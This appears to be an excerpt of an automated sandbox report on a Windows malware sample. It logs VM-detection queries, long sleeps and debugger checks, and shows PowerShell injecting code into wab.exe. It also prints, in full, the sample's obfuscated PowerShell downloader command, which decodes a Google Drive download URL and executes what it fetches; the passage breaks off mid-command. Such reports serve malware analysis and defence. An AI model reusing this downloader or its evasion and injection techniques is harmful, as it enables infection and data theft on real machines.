            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 21F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199871Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199765Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4976Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4945Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5902Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3920Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5908Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3940Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5112Thread sleep count: 5902 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3080Thread sleep count: 3860 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4344Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -29514790517935264s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -200000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6856Thread sleep count: 3920 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6856Thread sleep count: 5908 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99657s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99282s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99157s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99032s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98438s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98217s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97996s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97670s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97558s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99782s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99422s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99181s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -99079s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98966s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98846s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98484s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98375s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98266s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98156s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -98047s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97938s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97579s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97454s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -97328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -1199871s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6780Thread sleep time: -1199765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99032Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98217Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97996Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97670Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97558Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99181Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99079Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98966Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98846Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98484Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98375Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98266Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98047Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97579Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97454Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199871Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199765Jump to behavior
            Source: wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000002.00000002.2857899695.0000015938F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27CFB24Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF 